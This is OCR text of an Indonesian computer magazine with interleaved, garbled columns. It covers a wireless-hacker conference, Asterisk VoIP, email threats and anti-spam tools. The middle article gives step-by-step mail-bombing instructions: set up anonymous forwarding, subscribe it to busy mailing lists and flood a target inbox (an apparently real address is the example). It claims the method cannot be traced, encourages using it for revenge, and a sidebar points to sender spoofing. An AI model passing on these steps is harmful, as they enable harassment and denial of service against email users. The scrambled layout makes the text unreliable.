untuk membuat antenna sendiri. Mung- kaleng susu (dibimbing oleh Sebastian
kin ekuivalen dengan installfest kalau di & Carlo) dan antenna biquad (dibim-
komunitas Open Source dan Linux. bing oleh Offline-Horst dari Jerman).
Setelah dibekali sedikit teori tentang Teknik membuat antena kaleng dimu-
bagaimana kerja antenna, para peserta lai dengan ritual membuka kaleng, dan
menghabiskan isi kaleng yang berisi
buah-buahan kalengan yang tentunya
dinikmati oleh semua peserta. Dengan
Ronja twister. Mengkonversi interface mengukur diameter kaleng, maka mu-
RJ45 ke interface coaxial RX dan TX. lailah perhitungan dilakukan untuk
menentukan di titik mana lubang ha-
rus di buat untuk menginjeksi sinyal
radio. Kaleng mulai di lubangi satu per
satu bergantian di titik yang telah di-
tentukan.
Setelah kaleng dilubangi, selanjutnya
mereka memotong kabel yang agak
rigid untuk disolderkan ke konektor
tipe N. Potongan kecil kabel yang pan-
jangnya sekitar tiga cm ini sebetulnya
berfungsi sebagai antenna < panjang
gelombang.
Bagian yang cukup seru adalah pada
Ronja 10M Receiver. Menerima sinyal saat mengukur berapa panjang kabel
dari udara dan menyampaikannya ke rigid yang harus disisakan. Karena ka-
RX coaxial. lau terlalu panjang, atau terlalu pendek
Antena dari kaleng bir. maka antenna tidak match pada fre-

Ronja 10M Metropolis Transmitter.


Menyampaikan data dari TX coaxial ke
udara.
kuensi-nya berada dalam wilayah ratus-
an TeraHertz (Thz), sementara POSTEL
hanya mengatur frekuensi s/d wilayah
400GHz maka seharusnya dan sewa-
jarnya POSTEL tidak mengatur ope-
rasi jaringan data yang menggunakan
cahaya tersebut. Antena berbentuk harpa. Mengukur kekuatan singnal.

10 NeoTek Vol. IV No. 09


NeoStart

Onno W. Purbo dalam dalam Asterisk workshop

kuensi 2.4GHz sehingga performance (dari Italia) dan Rai?da (dari Jordania) Initiation Protocol). Karena SIP yang
antenna menjadi tidak baik. secara iseng, membuat antena dari digunakan sebagai basis, maka operasi
Selesai membuat antenna < panjang kotak minuman dan di ukur gain-nya VoIP lebih enteng daripada VoIP yang
gelombang, kita harus memasukan ternyata tidak berbeda jauh dengan menggunakan H.323 seperti VoIP
konektor tipe N ke kaleng dan mem- antenna kaleng. Merdeka.
bor mebuat lubang untuk mur/baut Di Indonesia pengoperasian jaringan
yang akan mengencangkan antenna < Teknologi VoIP SIP dilakukan oleh Anton Raharja
panjang gelombang pada tempatnya. Selain Wireless Internet, para geek dan (anton@ngoprek.org) dan dapat
Selesai sudah proses pembuatan hacker juga melakukan eksplorasi dan diregistrasi dari
antenna kaleng. Selanjutnya di ukur tukar pengalaman tentang telepon http://www.voiprakyat.net.
menggunakan SWR Meter dengan Internet. Software Asterisk dapat diambil dari
injeksi sinyal dari sumber sinyal video Saya pada akhirnya memimpin http://www.asterisk.org, sedang ber-
yang bekerja pada frekuensi 2.4GHz. workshop VoIP bagi para pemula di bagai dokumentasi dapat diambil dari
SWR meter tersebut buatan sendiri konvensi freifunk. Pada dasarnya http://www.asteriskdocs.org.
yang disain-nya dapat dicari di teknologi VoIP Merdeka yang berbasis Jika kita mengenal NetMeeting sebagai
www.google.com. protokol H.323 saya terangkan, semua softphone di Windows untuk H.323 yang
Proses pengukuran selanjutnya adalah materi seperti biasa dapat diambil dari digunakan oleh VoIP Merdeka, maka
mengukur kekuatan/gain antenna, hal http://www.apjii.or.id/onno/. untuk SIP kita mengenal beberapa soft-
ini dilakukan dengan cara memban- Pada kesempatan workshop VoIP un- phone yang gratis, seperti xlite (Windows),
dingkan kekuatan sinyal yang diterima tuk pemula, saya memang sengaja Sjphone & Kphone (Linux).
oleh antenna yang kita buat dengan membawa peralatan Internet Telephony Pada dasarnya ada tiga file konfigurasi
antenna referensi yang gain-nya dike- Gateway (ITG) yang biasa saya pakai yang harus di set untuk minimal meng-
tahui. Beberapa rekan seperti Carlo di rumah untuk menghubungkan VoIP operasikan sebuah server asterisk.
Merdeka ke PABX yang saya operasi-
kan di rumah, dan tentu saja dapat File /etc/asterisk/sip.conf untuk meng-
terhubung ke Telkom maupun HP me- atur terminal SIP yang tersambung ke
lalui Telkom. kita, /etc/asterisk/extension.conf untuk
mengatur numbering plan, routing
Para peserta cukup banyak yang nomor dll, dan /etc/asterisk/iax.conf
terkagum-kagum, karena selama ini untuk mengatur hubungan antar
mereka umumnya hanya sebagai Asterisk server.
pengguna VoIP, bukan penyelenggara
VoIP yang mengoperasikan gateway Demikian sepintas gambaran suasana
antara VoIP dengan telepon PSTN pertemuan para geek & hacker wire-
(milik Telkom). less Internet yang datang dari lebih 30
negara di dunia.
Asterisk: Sentral Telepon VoIP Merupakan pengalaman menarik karena
Dipimpin oleh Klaus Peter dari Berlin, saya adalah satu-satunya yang datang
para hacker yang lebih senior termasuk dari kawasan Asia Tenggara, dan cukup
saya menjadi peserta di dalamnya, ka- beruntung dapat berkontribusi dalam
mi mulai belajar mengoperasikan beberapa sesi dan memimpin workshop.
Asterisk. Onno W. Purbo
Asterisk pada dasarnya sentral telepon onno@indo.net.id
VoIP yang berbasis utama SIP (Session Rakyat Indonesia Biasa
Asterisk Mini-PABX

Vol. IV No. 09 NeoTek 11


NeoStart

BAHAYA EMAIL
Dari Spam sampai Virus
Email sudah menjadi perkara sehari-hari. Namun ternyata teknologi yang memudahkan hidup kita itu
dapat juga justru menjadi penyebab bencana. M.A. Rody Candera (odyxb@bogor.net)
mengingatkan anda agar jangan meremehkan potensi bahaya yang berasal dari email.

E
MAIL (ELEKTRONIK MAIL) MERUPAKAN TEROBOSAN DALAM
bidang teknologi internet yang mampu menggan-
tikan sistem korespondensi yang reguler. Benarkah
sistem korespondensi reguler akan tergeser posisinya oleh
sistem korespondensi elektronik (email)?
Sistem korespondensi reguler dan sistem korespondensi
elektronik memiliki kelebihan dan kekurangannya masing-
masing. Keberadaan email bukan untuk menggantikan sis-
tem korespondensi reguler, melainkan sebagai hasil dari
teknologi internet yang menempatkan email sebagai pilih-
an baru untuk berkomunikasi antar-pengguna internet
dalam suasana koresponden yang menyerupai sistem
korespondensi reguler.
Keberadaan email sendiri sudah sampai dirasakan perlu
untuk dimiliki baik secara personal maupun non-personal
dengan tujuan pemanfaatannya masing-masing.
Kini sudah banyak hadir website penyedia jasa email baik
yang gratis maupun yang tidak gratis untuk dapat memi-
liki sebuah email. Sebagai contoh yaitu Yahoo! website
penyedia jasa email yang memiliki anggota terbanyak Gambar 1. Contoh anonymail
dibandingkan penyedia jasa lainnya, menawarkan account
email mulai dari yang gratis sampai pada account email
yang memiliki tarif harga.
Bahaya Email
Perkembangan teknologi yang dirasakan makin marak ini
ternyata dibarengi oleh kehidupan dunia underground
yang menjadikan internet dirundung bahaya.
Email yang merupakan bagian dari hasil teknologi internet
juga terancam bahaya. Bahaya tersebut bisa datang dari
luar dan bisa juga diakibatkan kesalahan yang dilakukan
oleh penggunanya. Gambar 2. Anonymail yang ternyata berisi virus.
Menurut penulis, bahaya email jika dibagi-bagi berdasar- Saat ini, anonymail sering digunakan oleh seseorang yang
kan bentuknya dapat dibagi dalam lima macam yaitu: akan mengganggu privasi kita disertai sebuah paket yang
1. Anonymail berisi virus (virusmail).
2. Sinonymail
3. Virusmail MyDoom, salah satu jenis virus yang sangat berbahaya
4. MailBomber yang sempat menggegerkan dunia teknologi internet
5. Nigermail beberapa waktu lalu, hingga kini masih terus digunakan
oleh orang-orang isen untuk menganggu email anda.
Anonymail http://www.smg.vision.net.id/announcement.php?id=11
Berasal dari kata anonymous dan mail, jika diartikan yaitu
surat tidak dikenal (atau dapat juga dikatakan email kaleng
setara dengan surat kaleng). Tidak dikenal maksudnya
adalah pengirim surat tersebut. Seseorang yang meng-
ancam privasi email kita, biasanya menggunakan email
yang tidak mengindikasikan pemilik email. Maka pilihan
penggangu privasi kita tersebut menggunakan email yang
tidak dikenal oleh kita
Kepemilikan account email gratis oleh banyak disediakan
penyedia jasa email memungkinkan seseorang untuk men-
daftarkan sebuah account email dengan identitas palsu.
Gambar 3. Peringatan dari ISP tentang bahaya MyDoom.

12 NeoTek Vol. IV No. 09


NeoStart

Silakan kunjungin alamat situs di atas untuk mengetahui


sejauh mana bahaya virus tersebut. Berikut ini adalah URL
lain yang merupakan informasi yang masih berhubungan
virus yang mengancam email anda
http://nakula.rvs.uni-bielefeld.de/made/artikel/
VIRUS_MAIL
Synonymail
Ini merupakan kebalikan dari anonymail. Jika anonymail
merupakan surat yang tidak dikenal pemiliknya maka
sinonymail merupakan surat yang dikenal pengirimnya
dengan merujuk kepada alamat email yang digunakan.

Gambar 6. Phisingmail lain dari ‘Citibank’ yang pura-puranya


untuk menanggulangi identity theft.

Gambar 4. Contoh synonymail.

Tetapi kebenaran akan pengirimnya apakah benar orang


yang dikenal masih diragukan, karena bisa jadi pengirim-
nya adalah orang yang justru akan mengancam privasi
anda. Bahaya yang mengancam terbagi daslam dua bentuk:
1. Berisi pesan penipuan (Phisingmail)
2. Berisi Paket Virus (virusmail)
Phisingmail
PostCast Server (NeoTek Vol IV/02 pernah membahas ini),
merupakann sebuah program yang dapat disalahgunakan
untuk mengirimkan email kepada orang lain dengan
alamat email yang digunakan bisa sesuka hati kita

Gambar 7. Upaya phising kini menggunakan game yang dapat


menarik minat para korban.
Virusmail
Seperti yang telah disinggung pada anonymail dan sinony-
mail, yaitu email yang disertai paket virus. Bahaya yang
disebabkan virus tersebut bisa jadi sangat membahayakan
seperti kehilangan data atau dokumen yang disebabkan
virus yang didapat dari virusmail.
Baca www.vaksin.com yang menerangkan bahasan menge-
nai berbagai jenis virus berikut dampak yang dihasilkan
oleh virus tersebut.
Mail Bomber
Sudah pernah mengalami ini? Anda menerima banyak
email dari seseorang yang tidak anda kenal yang menye-
babkan inbox email anda penuh, akibatnya email anda over
Gambar 5. Phisingmail dari ‘Citibank Singapore’ yang me- quota sehingga tidak dapat menerima email dari teman
minta anda login dengan account name dan PIN. anda atau rekan bisnis anda.
Vol. IV No. 09 NeoTek 13
NeoStart

mendapatkan bagian dari usaha mencuci ‘lembaran dollar’


yang dicelup tinta hitam. Ini kisah nyata, bukan isapan
jempol belaka.
Email ini bisa saja mengunjungi anda, berisi pesan yang me-
nawarkan kerjasama atau permintaan tolong untuk menyi-
apkan sejumlah dana yang akan digunakan untuk penelu-
suran harta karun dan lain sebagainya dengan iming-iming
bagi hasil yang akan dilakukan jika nantinya berhasil.
Dengan pesan yang sangat menyakinkan bisa membuat
siapa saja bisa tertarik akan ajakan tersebut, teknik social
engineering berperan besar akan keberhasilan dalam
membujuk dan menyakinkan korban.
Antisipasi
Sedia payung sebelum hujan, jika tidak ingin menjadi
korban maka perlu diadakan pencegahan sebagai bentuk
antisipasi kita terhadap bahaya email.
Antisipasi yang dilakukan tidak sulit, yang dibutuhkan
adalah kesungguhan kita mengamankan privasi kita sendiri
Gambar 8. Google sangat memudahkan calon teroris cyber de- terhadap email yang dimiliki. Beberapa hal yang perlu di-
ngan menyediakan informasi tentang berbagai mail bomber. lakukan yaitu:
1. Gunakan program antivirus serta rajin-rajin melakukan
Bagaimana jika email penting yang sangat anda tunggu- update.
tunggu kehadirannya tidak dapat sampai ke inbox email anda
karena email mendapat ganggunan dari mailbomber. Jika 2. Jangan membuka email yang sekiranya tidak dikenal
pemiliknya atau diragukan pengirimnya.
inbox email penuh, maka anda wajib membersihkan inbox
dari email-email sampah (lumayan menghabiskan waktu). 3. Jangan men-download attachment yang disertakan dalam
email yang diterima sebelum mengerti benar paket tersebut.
Sekarang ada banyak program mailbomber yang beredar, un- 4. Pilihlah website penyedia email yang dapat dipercaya dan
tuk mendapatkannya bisa dicari dengan menggunakan search memiliki fasilitas baik, seperti Yahoo! dalam memfilter email
engine Google dengan keyword MailBomber atau lain seba- yang masuk.
gainya yang masih berhubungan dengan kata tersebut. 5. Rajin-rajin membaca informasi yang bertopik email, siapa
tahu berguna bagi kita semua, karena disadarkan penulis
Nigermail sendiri apa yang telah disajikan dalam tulisan ini belumlah
Mengapa diberi nama nigermail? Ini sangat fantastik, niger- cukup untuk memuaskan dahaga informasi akan bahaya
mail menjadi terkenal sebagai sebuah teknik penipuan yang email.
dilakukan melalui email yang pada awalnya dilakukan oleh
seorang warga Nigeria, oleh sebab itu dinamakan nigermail
(atau Nigerian scam). Unjuk kebolehan dari dampak yang
dihasilkan email ini masih terjadi, beberapa waktu lalu se-
orang warga Singapura yang menjadi korban karena ingin

Gambar 9. Nigermail bukan hanya usaha penipuan yang dila-


Gambar 9. Posting di milis majalahneotek yang membahas car- kukan oleh para warga Nigeria, kini Perang Irak pun dipakai
a menangani mail bomber. sebagai ‘cerita sedih’ dari ‘uang yang tertindas.’

14 NeoTek Vol. IV No. 09


NeoStart

BAHAYA EMAIL
Ngebom Email Lewat Email
Menjadi terrorist berat hukumannya. Tapi terrorist di dunia cyber memberikan
wawasan yang lain. Dengan sekedar menggunakan layanan email
anda bisa juga menjadi terrorist. Bagaimana mungkin?

S
EMENJAK INTERNET MERAMBAH LAPISAN MASYARAKAT
di Indonesia tidak sedikit masyarakat kita yang mu-
lai menggunakan fasilitas internet sebagai cara
terbaik untuk meningkatkan atau melebarkan sayap usaha-
nya. Dan tidak sedikit pula dari mereka yang menggunakan
jasa mailing list untuk mempromosikan dan menjual barang
yang mereka tawarkan. Email adalah kunci semua itu. Dengan
email anda dapat berkomunikasi dengan orang manapun
dan berada di belahan dunia manapun juga. Semakin marak-
nya orang mem-publish email mereka , banyak juga saing-
an atau orang yang iri dengan cara melakukan tindakan
pengrusakan email.
Istilah Bombing muncul ketika seseorang mendapati mail box-
nya berisi email yang banyak (melebihi kapasitas), yang mem-
punyai alamat pengirim yang sama, isi yang sama, subject
yang sama dan datang dalam waktu berurutan. Sebenarnya
hal ini ialah mungkin saja bisa terjadi ketika sebuah mail
server tidak menyediakan servis yang memuaskan ketika
terjadi serangan, thread atau Denial of Service sekalipun.
Kejahatan email seperti diatas secara umum di sebut SPAM.
Begitu banyak arti dari spam tapi nge-bom email juga dapat Gambar 1. Alur Forward.
di kategorikan spam. Dan tentunya sudah menjadi keharus-
an mail server tersebut untuk memberikan layanan anti dan tentunya gratis. Setelah pencarian yang lama akhirnya
spam atau setidaknya bekerja sama dengan lembaga atau saya ketemukan situs yang memberikan fasilitas forward
software house untuk menanganinya. secara gratis. Cara forwardnya pun aneh lain dari mail ser-
ver yang lain yang mempunyai fasilitas sejenis.
Tapi syukurnya, sekarang aksi bombing sudah jarang dan
tidak bisa dilakukan karena beberapa mail server sudah di Cara Kerja Email Forwarding
lengkapi dengan aplikasi anti spam. Namun tidak menutup Asumsikan bahwa account di mail server A dapat mem-
kemungkinan mail server lain, yang telah penulis uji yaitu forward ke account di mail server B dan mail server C.
telkom.net yang masih jebol jika di bom.
1. Email yang masuk di account mail server A telah di-
Cara Ngebom Email Lewat Email setting forward-nya. Email yang masuk tersebut akan di-
Kenapa harus email yang menjadi sasaran, kenapa tidak si- forward ke account di mail server B dan mail server C.
tus atau keamanan server? Sebenarnya mudah saja, email 2. Tentunya dalam hal setting forward di mail server A ha-
merupakan tempat untuk menghubungi seseorang di dunia rusnya ada handshaking antara mail server A dengan
cyber. Layaknya No. HP atau telepon, dapatkah anda ba- mail server B atau mail server C dengan memasukkan
yangkan jika anda tidak mempunyai nomor telepon yang account email dan passwordnya. Jika autentikasi telah
bisa dihubungi ketika ingin melamar pekerjaan? Tentunya berjalan sempurna maka proses forward akan berjalan
hal ini akan mempersulit anda. Begitu juga dengan email semestinya
yang notebene merupakan identitas seseorang di dunia
cyber untuk dapat bisa saling berkomunikasi. Secara mendasar dan umum proses forward email seperti di
jelaskan diatas. Dari keterangan diatas dapat digarisbawahi
Nah dari sinilah bisa di tarik kesimpulan bahwa email ialah bahwa untuk melakukan forward yang harus kita setting
identitas layaknya KTP atau alamat rumah anda di Internet. ialah account email dan password.
Maka jika anda ingin berbuat 'nakal' sebaiknya ganggu se-
seorang melalui emailnya. Cara yang saya tawarkan ialah Bagaimana jika ada mail server yang mempunyai fasilitas
bomb email. Cara ini sebenarnya cara kuno tapi jangan forwarding gratis, setting forward tanpa harus memasukkan
sangka trik 'hitam' dari saya ini akan membuat siapapun password, dan semua email yang masuk langsung di-forward
yang menjadi target akan beram dan saya yakin itu. Trik ini ke email target tanpa harus di save di inbox?
saya namai ngebom email lewat email. Anda penasaran?
Cara ini saya ketemukan ketika saya mempunyai banyak Mail server tersebut ialah http://www.emailaccount.com.
email. Sedangkan semua email tersebut aktif. Karena masa- Sebelum saya jabarkan tehnik ngebom ini sebaiknya per-
lah ini dan bingung mengelolanya maka saya membutuh- siapkan satu email target yang akan dijadikan korban.
kan satu account email yang mempunyai fasilitas forward Dalam contoh ini ialah mwiryanu@telkom.net

Vol. IV No. 06 NeoTek 15


NeoStart

Langkah-langkah Ngebom
1. Buka situs http://www.emailaccount.com dan daftar
email di sana.

Gambar 4. .Email forwarding

? Do not forward any new messages


Artinya bahwa semua email yang masuk jangan di
Gambar 2. http://www.emailaccount.com forward.
2. Setelah proses sign up selesai login dengan account tadi. ? Forward all new messages to the email address(es).
Forward semua email yang masuk ke email target tanpa
di save di inbox. Jadi inbox kita akan kosong selamanya.
? Forward all new messages to the email address(es) below
and save a copy in this mailbox
Forward semua email yang masuk ke email target dan
tetap copykan ke inbox.
Untuk melakukan bomb gunakan opsi ke dua forward se-
mua email yang masuk ke email target tanpa meninggalkan
sisa di inbox.
Masukkan email target, contoh: mwiryanu@telkom.net
anda pun dapat memasukkan satu atau dua email sekaligus
pisahkan dengan koma dan spasi.

Gambar 3. .Account di emailaccount.com.

Logika dasar tehnik bom ialah memperbanyak jumlah email


yang masuk ke inbox target dan usahakan sampai penuh.
Sebelum anda aktifkan forwardingnya sebaiknya anda daf-
tarkan account anda di mailing list. Mailing list yang paling
ramai ialah mailing list untuk developer linux. Mailing list
yang saya gunakan kali ini ialah di situs
http://www.mandrakelinux.com/en/flists.php3.
Daftarkan sebanyak-banyaknya account anda disitu. Setelah
itu pastikan anda telah terdaftar sebagai anggota mailing list
3. Setelah proses subscribe milist selesai dan terdaftar ten-
tunya account anda akan menerima banyak email. Peng- Gambar 5. Target bomb.
alaman penulis jika anda mendaftar milist di situs ter-
sebut anda akan menerima rata-rata kurang lebih 250 Setelah itu tekan save. Jika anda menggunakan opsi kedua
email dalam 6 jam. Yang tentunya dalam sehari bisa- maka selamanya email yang masuk tidak akan berada di
bisa email anda penuh apalagi seminggu dan ini cukup inbox tapi akan berada di inbox target dalam hal ini
untuk mengerjai email orang lain. mwiryanu@telkom.net
4. Klik menu option pada frame sebelah kiri, setelah itu 5. Untuk mengetes kebenaran cara ini, akan saya buka
klik Email Forwarding. email mwiryanu@telkom.net. Inbox pada email ini
selang 6 jam setelah forward diaktifkan.
Kali ini adalah inti dari artikel ini. Jika anda melihat menu
forward pada Gambar 4 tentunya anda akan merasa heran. Bisa anda bayangkan 250-an email di inbox? Tentunya ini
Opsi forward tersebut ialah: akan menjadi momok jika anda mudah sekali menunjukkan
email anda ke orang lain.

16 NeoTek Vol. IV No. 06


NeoStart

Bisa anda lihat pada Gambar 7 apakah sender (alamat pe-


ngirim) berasal dari account anda di emailaccount.com?
Namun jika anda mendaftar milist di yahoogroups maka
account pengirim akan terlacak, sebab jika anda mendaftar
milist di yahoogroups maka alamat pada sender ialah alamat
account pengirim.
Sekarang anda sudah mengetahui bagaimana ngebom email
lewat email itu. Kebanyakan dan umum terjadi dalam dunia
internet yaitu email penuh dengan iklan-iklan yang kita sen-
diri tidak pernah dan tahu kapan subscribe. Email ini bisa di
kategorikan junk mail dimana anda tidak menghendaki email
tersebut. Dan keadaan tersebut sangat mungkin terjadi jika
anda mempunyai teman yang usil yang suka mendaftarkan
email teman-temannya di situs iklan atau promosi. Untuk
membalas tindakan teman-teman anda tersebut anda dapat
gunakan cara diatas.
Gambar 6 .Inbox target hasil forward Saran saya sebaiknya anda mendaftar banyak email. Sehingga
jika anda mengalami seperti diatas maka anda masih dapat
Pertanyaan besar muncul, apakah alamat email pengirim menggunakan email yang lain.
bisa terlacak? Jawabnya tidak selama anda mendaftarkan
milist di situs tersebut di atas. Selamat Mencoba.
Berikut akan ditampilkan isi dari email yang forward ke Penulis: M Syafii (sapitenk@telkom.net) dan M Zainal A
mwiryanu@telkom.net (agendogget@telkom.net)

Gambar 7. Isi email Gambar 8. Sender terdeteksi.

Email Sebagai Senjata Adapun untuk menjaga kerahasiaan isi email, anda disa-
rankan menerapkan enkripsi terhadap email anda. Untuk
Dari Email Kaleng sampai Spam ini yang paling lazim digunakan dan sudah teruji ketang-
guhannya adalah PGP (Pretty Good Privacy).
U
NTUK MELENGKAPI BAHASAN MENGENAI BAHAYAEMAIL
dalam NeoTek edisi ini, disarankan anda membuka PGP pernah dibahas secara terinci dalam NeoTek II/11
kembali NeoTek III/02, khususnya halaman 14-16 halaman 40-45, yaitu:
dengan judul di atas. PGP Freeware 7.0.3: Instalasi dan Mengirim Gembok
Disini dibahas cara mengirim email tanpa alamat (email
PGP Freeware 7.0.3: Import Keyring dan Email
kaleng) menggunakan fasilitas remailer dari software Terenkripsi
seperti Private Idaho.
PGP Freeware: Enkripsi/Dekripsi untuk Web Mail
Anda dapat pula mengirim email dengan alamat palsu,
yang dalam edisi ini disarankan dengan memanipulasi Pop mail client seperti Outlook ataupun Outlook Express
header email menggunakan fasilitas standar telnet dalam sangat rentan terhadap attachment virus dan trojan, se-
mengirim email (tulisan Onno W. Purbo di NeoTek II/4). hingga sedapat mungkin gunakan dulu email remover
Apabila menggunakan telnet masih terlalu teknis untuk untuk menseleksi email yang akan di-download.
anda, gunakan saja local SMTP server seperti PostCast Gunakan dulu web mail service sebelum men-download
Server yang dibahas di NeoTek IV/02 halaman 44. email menggunakan pop mail client.
Email bombing yang dibahas terinci pada NeoTek kali ini Dapat juga anda menggunakan pop mail client yang
pernah juga dibahas sepintas pada NeoTek Vol. III No. relatif lebih aman seperti misalnya The Bat.
02, yang disini anda disarankan menggunakan softare
email remover untuk menghadapinya.

Vol. IV No. 06 NeoTek 17


NeoStart

BAHAYA EMAIL
Menanggulangi Spam
Spam adalah email yang tidak dikehendaki. Namanya diambil dari makanan kaleng jaman Perang Dunia II,
yang tidak diingini dibandingkan daging segar atau ham yang disetarakan dengan email yang memang
dikehendaki. MA Rody Candera (odyxb@bogor.net) membahas konsep menanggulangi spam.
Menanggulangi Spam
A
NDA PENGGUNA EMAIL? BERHATI-HATILAH. EMAIL BUKAN
barang baru lagi di dunia internet, hampir semua Metode Dasar
pengguna internet memiliki account email baik
berupa account gratis sampai yang account non-gratis. Umumnya cara yang dilakukan dalam mengantisipasi spam
Beberapa tahun terakhir, spam message makin hebat adalah dengan melakukan filterisasi yaitu Filtering by
melakukan aksinya. Berdasarkan hasil riset mengatakan Keyword dan Filtering by Email Address.
"dari 300 message yang diterima oleh email, hanya 30 1. Filtering by Keyword
yang merupakan message yang bukan spam message".
Cara ini berpedoman kepada words detection (deteksi kata-
Apakah begitu merajalelanya spam messages? Untuk kata). Deteksi tersebut didasarkan kepada input keyword
mengetahuinya, anda dapat mengetahuinya dengan (kata kunci) pada list keyword filtering dengan pilihan
membaca RFC2635 yang menjelaskan Mengapa Spam itu words yang mengandung kesan promotion, advertisement,
Berbahaya (http://www.faqs.org/rfcs/rfc2635.html). dan refinance.
RFC2635 tidak hanya menjelaskan bahaya spam message
tetapi juga petunjuk-petunjuk dalam mengatasi spam 2. Filtering by Email Address
message baik untuk admin system sampai user biasa. Cara ini dapat diberlakukan untuk mengantisipasi spam
Spam pertama kalinya ditemukan pada bulan Mei 1978, berdasarkan input alamat email pada list email address
ditandai dengan message yang berisi iklan yang dikirimkan filtering. Dengan cara ini, maka email yang masuk kedalam
ke setiap pemilik account email di West Coast yang memi- daftar filtering dapat diposisikan pada direktori khusus
liki pelanggan lebih dari 600 orang. Berikut dibawah ini seperti Bulk Directory atau bahkan ditolak.
adalah kutipan spam message tersebut:
DIGITAL WILL BE GIVING A PRODUCT PRESENTATION OF THE NEWEST
MEMBERS OF THE DECSYSTEM-20 FAMILY; THE DECSYSTEM-2020, 2020T,
2060, AND 2060T. THE DECSYSTEM-20 FAMILY OF COMPUTERS HAS
ENVOLVED OPERATING SYSTEM AND THE DECSYSTEM-10 <PDP-10>
COMPUTER ARCHITECTURE. BOTH THE DECSYSTEM-2060T AND 2020T
OFFER FULL ARPANET SUPPORT UNDER THE TOPS-20 OPERATING SYSTEM.
THE DECSYSTEM-2060 IS AN UPWARD EXTENSION OF THE CURRENT
DECSYSTEM 2040 AND 2050 FAMILY. THE DECSYSTEM-2020 IS A NEW LOW
END MEMBER OF THE DECSYSTEM-20 FAMILY AND FULLY SOFTWARE
COMPATIBLE WITH ALL OF THE OTHER DECSYSTEM-20 MODELS.
WE INVITE YOU TO COME SEE THE 2020 AND HEAR ABOUT THE
DECSYSTEM-20 FAMILY AT THE TWO PRODUCT PRESENTATIONS WE WILL
BE GIVING IN CALIFORNIA THIS MOTH. THE LOCATIONS WILL BE:
TUESDAY, MAY 9, 1978 -2 PM
HYATT HOUSE (NEAR THE L.A. AIRPORT)
LOS ANGELES, CA
THURSDAY, MAY 11, 1978 - PM
DUNFEY'S ROYAL COACH
SAN MATEO, CA
(4 MILES SOUTH OF S.F. AIRPORT AT BAYSHORE, RT 101 AND RT 92)
A 2020 WILL BE THERE FOR YOU TO VIEW. ALSO TERMINALS ON-LINE TO
OTHER DECSYSTEM-20 SYSTEMS THROUGH THE ARPANET. IF YOU ARE
UNABLE TO ATTEND, PLEASE FEEL FREE TO CONTACT THE NEAREST DEC Gambar 2. Memfilter email.
OFFICE FOR MORE INFORMATION ABOUT THE EXCITING DECSYSTEM-20
FAMILY. DNS Blacklist
Gambar 1. Kutipan spam message yang pertama DNSBL (DNS Blacklist) adalah salah satu dari beberapa
teknik dalam menangani spam. DNSBL merupakan bagian
Istilah SPAM awalnya berasal dari USENET, yaitu sebuah yang ter-integrasi dalam spam-fighting toolkit untuk me-
World Wide Bulletin Board System tempat orang-orang lakukan tugas dalam mem-blocking spammer. DNSBL
saling posting messages dalam sebuah forum umum. terdiri dari dua tipe berdasarkan penggunaannya yaitu:
USENET memberikan istilah SPAM untuk UNWANTED 1. IP-based DNS Backlist
POSTING.
Blakclist yang dilakukan berdasarkan alamat IP (Internet
Istilah spam message pada email juga dikenal dengan isti- Protocol) dari server mail pengirim. Setiap host termasuk
lah "junk" email. Email yang merupakan bagian dari hasil didalamnya e-mail server, terkoneksi ke internet memiliki
teknologi internet juga terancam bahaya. Bahaya tersebut alamat IP yang unik. Alamat IP ini ditandai dalam sebuah
bisa datang dari luar dan bisa juga diakibatkan kesalahan database jika teridentifikasi sebagai sebagai spammer.
yang dilakukan oleh penggunanya.

18 NeoTek Vol. IV No. 09


NeoStart

Skema kerja dari IP-based DNSBL seperti yang digam- SpamHaus


barkan pada Gambar 3. Jika menggunakan spamcop dikenakan biaya, maka untuk
Email delivered to menggunakan spamhaus justru tidak dikenakan biaya.
email server or anti -
spam software Spamhaus merupakan DNSBL yang terkenal dan juga
sangat efektif dalam menangani spam. Kunjungi situsnya
Software examines the
yang beralamat di www.spamhaus.org
RFC Ignorant
sender IP addresses within
the email headers

RFCI bukan merupakan bagian dari DNSBL, RFC meru-


Software reverses IP and pakan singkatan dari Request for Comments. RFC bersifat
appends FQDN of the
DNSBL server being used blueprint maupun sebagai human protocol dalam meng-
konfigurasi dan menjalankan server di internet. Lalu bagai-
mana hubungannya dengan spam?
Software looks up the
reverse IP/FQDN of the
DNSBL server being used
Spammer (pelaku spam) berusaha untuk menutup-nutupi
informasi mengenai mereka sebisa mungkin. RFCI dapat
anda temukan di situs http://www.rfc-ignorant.org dan
RFC online dapat ditemukan di http://www.ietf.org
Is a “loopback” Sender IP in DNSBL
IP Returned reject/tag/score/email SpamAssassin
SpamAssassin adalah sebuah spam filtering utility yang
Sender IP not in
ditulis dalam bahasa skrip Perl dan bahasa pemograman C
DNSBL send email dibuat April 2002. Project SpamAssassin dapat ditemukan
on to recipient
di http://www.spamassassin.org
Gambar 3. Skema kerja IP-based DNS Blacklist.

2. Domain-based DNS Blacklist


Disebut juga right-hand side blacklist (RHSBLs). Blacklist
yang dilakukan pada second-level dan top-level domain,
contoh: *.com ? ?yahoo.com. Gambar 4 menunjukkan ske-
ma kerja dari Domain-based DNSBL:

Email delivered to Gambar 5. SpamAssasin merupakan salah satu proyek Apache.


email server or anti-
spam software

Software examines the


Pada dasarnya SpamAssassin melakukan analisa terhadap
domain on right -hand side
of the sender email address
header dan body dari email yang datang. Berikut ini sistem
analisis yang dilakukan oleh SpamAssassin:
Software append FQDN of 1. Header Analisis
the DNSBL server being
used to the sender domain SpamAssassin melihat pada source email mulai dari
validitas email, validitas time zones, dan tanda error
Software looks up the
lainnya.
reverse domain/FQDN in
the Domain Name System 2. Body Analisis
Sedikit sekali spam yang terlihat sama. Itu dimungkinkan
Is a “loopback”
Sender domain in spam memiliki line number seperti "click here", sedikit
IP Returned
DNSBL
reject/tag/score/email YELLING!, tidak memperlihatkan HTML yang salah, dan
terdapat kalimat kunci seperti "don't miss out" atau
"absolutely free". SpamAssassin melakukan cek dan ricek
Sender domain not
in DNSBL send
pada setiap pesan yang terlihat mengindikasikasi spam.
3. Bayesian Analisis
email on to recipient

Mulai versi 2.5, SpamAssassin dilengkapi dengan sebuah


Gambar 4. Skema kerja Domain-based DNS Blacklist. bayesian spam classifier. hal tersebut mengijinkan
SpamAssassin untuk belajar apakah input dari seorang
Blacklist dan Filtering Tool user adalah spam atau tidak.
SpamCop 4. DNS Blacklist
Spamcop merupakan salah satu DNSBL yang terkenal sejak SpamAssassin support akan DNSBL, mengenai DNSBL
tahun 1998 di Seattle yang dijalankan oleh Julian Haight. telah disinggung sebelumnya.
